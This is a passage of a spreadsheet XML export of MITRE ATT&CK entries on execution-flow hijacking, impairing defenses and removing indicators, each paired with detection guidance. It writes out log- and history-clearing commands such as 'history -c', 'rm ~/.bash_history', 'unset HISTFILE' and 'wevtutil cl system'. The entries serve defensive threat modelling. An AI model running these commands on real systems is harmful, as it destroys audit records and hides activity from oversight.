On Linux, adversaries may set &lt;code&gt;LD_PRELOAD&lt;/code&gt; to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. &lt;code&gt;LD_PRELOAD&lt;/code&gt; can be set via the environment variable or &lt;code&gt;/etc/ld.so.preload&lt;/code&gt; file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by &lt;code&gt;LD_PRELOAD&lt;/code&gt; are loaded and mapped into memory by &lt;code&gt;dlopen()&lt;/code&gt; and &lt;code&gt;mmap()&lt;/code&gt; respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) 
On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt; environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/006</t>
  </si>
  <si>
    <t>Monitor for changes to environment variables and files associated with loading shared libraries such as &lt;code&gt;LD_PRELOAD&lt;/code&gt; and &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt;, as well as the commands to implement these changes.
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1574.005</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Executable Installer File Permissions Weakness</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These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Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the &lt;code&gt;%TEMP%&lt;/code&gt; directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012)  (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/005</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1574.007</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Path Interception by PATH Environment Variable</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, &lt;code&gt;%SystemRoot%\system32&lt;/code&gt; (e.g., &lt;code&gt;C:\Windows\system32&lt;/code&gt;), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
For example, if &lt;code&gt;C:\example path&lt;/code&gt; precedes &lt;/code&gt;C:\Windows\system32&lt;/code&gt; is in the PATH environment variable, a program that is named net.exe and placed in &lt;code&gt;C:\example path&lt;/code&gt; will be called instead of the Windows system "net" when "net" is executed from the command-line.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/007</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Stefan Kanthak</t>
  </si>
  <si>
    <t>T1574.008</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Path Interception by Search Order Hijacking</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
For example, "example.exe" runs "cmd.exe" with the command-line argument &lt;code&gt;net user&lt;/code&gt;. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then &lt;code&gt;cmd.exe /C net user&lt;/code&gt; will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/008</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
</t>
  </si>
  <si>
    <t>T1574.009</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Path Interception by Unquoted Path</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., &lt;code&gt;C:\unsafe path with space\program.exe&lt;/code&gt; vs. &lt;code&gt;"C:\safe path with space\program.exe"&lt;/code&gt;). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is &lt;code&gt;C:\program files\myapp.exe&lt;/code&gt;, an adversary may create a program at &lt;code&gt;C:\program.exe&lt;/code&gt; that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/009</t>
  </si>
  <si>
    <t>T1574.010</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Services File Permissions Weakness</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/010</t>
  </si>
  <si>
    <t xml:space="preserve">Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. </t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1574.011</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Services Registry Permissions Weakness</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.  Windows stores local service configuration information in the Registry under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: Registry Key Security)
If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).
Adversaries may also alter Registry keys associated with service failure parameters (such as &lt;code&gt;FailureCommand&lt;/code&gt;) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/011</t>
  </si>
  <si>
    <t>Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1562</t>
  </si>
  <si>
    <t>Impair Defenses</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</si>
  <si>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
Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
Monitor environment variables and APIs that can be leveraged to disable security measures.</t>
  </si>
  <si>
    <t>Containers, IaaS, Linux, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Disable, Cloud Service: Cloud Service Modification, Command: Command Execution, Firewall: Firewall Disable, Firewall: Firewall Rule Modification, Process: Process Termination, Script: Script Execution, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Anti-virus, Digital Certificate Validation, File monitoring, Firewall, Host forensic analysis, Host intrusion prevention systems, Log analysis, Signature-based detection</t>
  </si>
  <si>
    <t>T1562.008</t>
  </si>
  <si>
    <t>Impair Defenses: Disable Cloud Logs</t>
  </si>
  <si>
    <t>An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. 
Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/008</t>
  </si>
  <si>
    <t>12 October 2020</t>
  </si>
  <si>
    <t>Monitor logs for API calls to disable logging. In AWS, monitor for: &lt;code&gt;StopLogging&lt;/code&gt; and &lt;code&gt;DeleteTrail&lt;/code&gt;.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: &lt;code&gt;google.logging.v2.ConfigServiceV2.UpdateSink&lt;/code&gt;.(Citation: Configuring Data Access audit logs)  In Azure, monitor for &lt;code&gt;az monitor diagnostic-settings delete&lt;/code&gt;.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Disable, Cloud Service: Cloud Service Modification</t>
  </si>
  <si>
    <t>Alex Soler, AttackIQ; Ibrahim Ali Khan; Janantha Marasinghe; Matt Snyder, VMware; Prasad Somasamudram, McAfee; Sekhar Sarukkai, McAfee ; Syed Ummar Farooqh, McAfee</t>
  </si>
  <si>
    <t>T1562.002</t>
  </si>
  <si>
    <t>Impair Defenses: Disable Windows Event Logging</t>
  </si>
  <si>
    <t>Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.
Adversaries may targeting system-wide logging or just that of a particular application. By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/002</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for commands that can be used to disable logging. Lack of event logs may be suspicious.</t>
  </si>
  <si>
    <t>Command: Command Execution, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>Log analysis</t>
  </si>
  <si>
    <t>T1562.007</t>
  </si>
  <si>
    <t>Impair Defenses: Disable or Modify Cloud Firewall</t>
  </si>
  <si>
    <t>Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). 
Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS)
Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/007</t>
  </si>
  <si>
    <t>Monitor cloud logs for modification or creation of new security groups or firewall rules.</t>
  </si>
  <si>
    <t>Firewall: Firewall Disable, Firewall: Firewall Rule Modification</t>
  </si>
  <si>
    <t>Expel</t>
  </si>
  <si>
    <t>T1562.004</t>
  </si>
  <si>
    <t>Impair Defenses: Disable or Modify System Firewall</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/004</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.</t>
  </si>
  <si>
    <t>Command: Command Execution, Firewall: Firewall Disable, Firewall: Firewall Rule Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Firewall</t>
  </si>
  <si>
    <t>T1562.001</t>
  </si>
  <si>
    <t>Impair Defenses: Disable or Modify Tools</t>
  </si>
  <si>
    <t>Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/001</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.</t>
  </si>
  <si>
    <t>Containers, IaaS, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Gal Singer, @galsinger29, Team Nautilus Aqua Security; Nathaniel Quist, Palo Alto Networks; Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security</t>
  </si>
  <si>
    <t>Anti-virus, File monitoring, Host intrusion prevention systems, Log analysis, Signature-based detection</t>
  </si>
  <si>
    <t>T1562.003</t>
  </si>
  <si>
    <t>Impair Defenses: Impair Command History Logging</t>
  </si>
  <si>
    <t>Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. 
On Linux and macOS, command history is tracked in a file pointed to by the environment variable &lt;code&gt;HISTFILE&lt;/code&gt;. When a user logs off a system, this information is flushed to a file in the user's home directory called &lt;code&gt;~/.bash_history&lt;/code&gt;. The &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable keeps track of what should be saved by the &lt;code&gt;history&lt;/code&gt; command and eventually into the &lt;code&gt;~/.bash_history&lt;/code&gt; file when a user logs out. &lt;code&gt;HISTCONTROL&lt;/code&gt; does not exist by default on macOS, but can be set by the user and will be respected.
Adversaries may clear the history environment variable (&lt;code&gt;unset HISTFILE&lt;/code&gt;) or set the command history size to zero (&lt;code&gt;export HISTFILESIZE=0&lt;/code&gt;) to prevent logging of commands. Additionally, &lt;code&gt;HISTCONTROL&lt;/code&gt; can be configured to ignore commands that start with a space by simply setting it to "ignorespace". &lt;code&gt;HISTCONTROL&lt;/code&gt; can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
On Windows systems, the &lt;code&gt;PSReadLine&lt;/code&gt; module tracks commands used in all PowerShell sessions and writes them to a file (&lt;code&gt;$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; by default). Adversaries may change where these logs are saved using &lt;code&gt;Set-PSReadLineOption -HistorySavePath {File Path}&lt;/code&gt;. This will cause &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command &lt;code&gt;Set-PSReadlineOption -HistorySaveStyle SaveNothing&lt;/code&gt;.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/003</t>
  </si>
  <si>
    <t xml:space="preserve">Correlating a user session with a distinct lack of new commands in their &lt;code&gt;.bash_history&lt;/code&gt; can be a clue to suspicious behavior. Additionally, users checking or changing their &lt;code&gt;HISTCONTROL&lt;/code&gt;, &lt;code&gt;HISTFILE&lt;/code&gt;, or &lt;code&gt;HISTFILESIZE&lt;/code&gt; environment variables may be suspicious.
Monitor for modification of PowerShell command history settings through processes being created with &lt;code&gt;-HistorySaveStyle SaveNothing&lt;/code&gt; command-line arguments and use of the PowerShell commands &lt;code&gt;Set-PSReadlineOption -HistorySaveStyle SaveNothing&lt;/code&gt; and &lt;code&gt;Set-PSReadLineOption -HistorySavePath {File Path}&lt;/code&gt;. </t>
  </si>
  <si>
    <t>Emile Kenning, Sophos; Vikas Singh, Sophos</t>
  </si>
  <si>
    <t>Host forensic analysis, Log analysis</t>
  </si>
  <si>
    <t>T1562.006</t>
  </si>
  <si>
    <t>Impair Defenses: Indicator Blocking</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) &lt;code&gt;Set-EtwTraceProvider&lt;/code&gt; cmdlet or by interfacing directly with the Registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/006</t>
  </si>
  <si>
    <t>13 January 2021</t>
  </si>
  <si>
    <t>Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.
Depending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}&lt;/code&gt;</t>
  </si>
  <si>
    <t>Command: Command Execution, Sensor Health: Host Status, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Rob Smith</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems</t>
  </si>
  <si>
    <t>T1525</t>
  </si>
  <si>
    <t>Implant Internal Image</t>
  </si>
  <si>
    <t>Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1525</t>
  </si>
  <si>
    <t>04 September 2019</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.
In containerized environments, changes may be detectable by monitoring the Docker daemon logs or setting up and monitoring Kubernetes audit logs depending on registry configuration. </t>
  </si>
  <si>
    <t>Containers, IaaS</t>
  </si>
  <si>
    <t>Image: Image Creation, Image: Image Modification</t>
  </si>
  <si>
    <t>Praetorian; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>Indicator Removal on Host</t>
  </si>
  <si>
    <t>Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*.
These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files.  Events not stored on the file system may require different detection mechanisms.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, User Account: User Account Authentication, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Brad Geesaman, @bradgeesaman; Ed Williams, Trustwave, SpiderLabs</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems, Log analysis</t>
  </si>
  <si>
    <t>T1070.003</t>
  </si>
  <si>
    <t>Indicator Removal on Host: Clear Command History</t>
  </si>
  <si>
    <t>In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable &lt;code&gt;HISTFILE&lt;/code&gt;. When a user logs off a system, this information is flushed to a file in the user's home directory called &lt;code&gt;~/.bash_history&lt;/code&gt;. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
Adversaries may delete their commands from these logs by manually clearing the history (&lt;code&gt;history -c&lt;/code&gt;) or deleting the bash history file &lt;code&gt;rm ~/.bash_history&lt;/code&gt;.
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the &lt;code&gt;PSReadLine&lt;/code&gt; module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The &lt;code&gt;PSReadLine&lt;/code&gt; command history tracks the commands used in all PowerShell sessions and writes them to a file (&lt;code&gt;$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command &lt;code&gt;Clear-History&lt;/code&gt; to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; file. Adversaries may also delete the &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/003</t>
  </si>
  <si>
    <t>31 January 2020</t>
  </si>
  <si>
    <t>User authentication, especially via remote terminal services like SSH, without new entries in that user's &lt;code&gt;~/.bash_history&lt;/code&gt; is suspicious. Additionally, the removal/clearing of the &lt;code&gt;~/.bash_history&lt;/code&gt; file can be an indicator of suspicious activity.
Monitor for suspicious modifications or deletion of &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; and use of the &lt;code&gt;Clear-History&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, File: File Modification</t>
  </si>
  <si>
    <t>T1070.002</t>
  </si>
  <si>
    <t>Indicator Removal on Host: Clear Linux or Mac System Logs</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the &lt;code&gt;/var/log/&lt;/code&gt; directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
* &lt;code&gt;/var/log/messages:&lt;/code&gt;: General and system-related messages
* &lt;code&gt;/var/log/secure&lt;/code&gt; or &lt;code&gt;/var/log/auth.log&lt;/code&gt;: Authentication logs
* &lt;code&gt;/var/log/utmp&lt;/code&gt; or &lt;code&gt;/var/log/wtmp&lt;/code&gt;: Login records
* &lt;code&gt;/var/log/kern.log&lt;/code&gt;: Kernel logs
* &lt;code&gt;/var/log/cron.log&lt;/code&gt;: Crond logs
* &lt;code&gt;/var/log/maillog&lt;/code&gt;: Mail server logs
* &lt;code&gt;/var/log/httpd/&lt;/code&gt;: Web server access and error logs
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/002</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.</t>
  </si>
  <si>
    <t>T1070.001</t>
  </si>
  <si>
    <t>Indicator Removal on Host: Clear Windows Event Logs</t>
  </si>
  <si>
    <t>Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.
The event logs can be cleared with the following utility commands:
* &lt;code&gt;wevtutil cl system&lt;/code&gt;
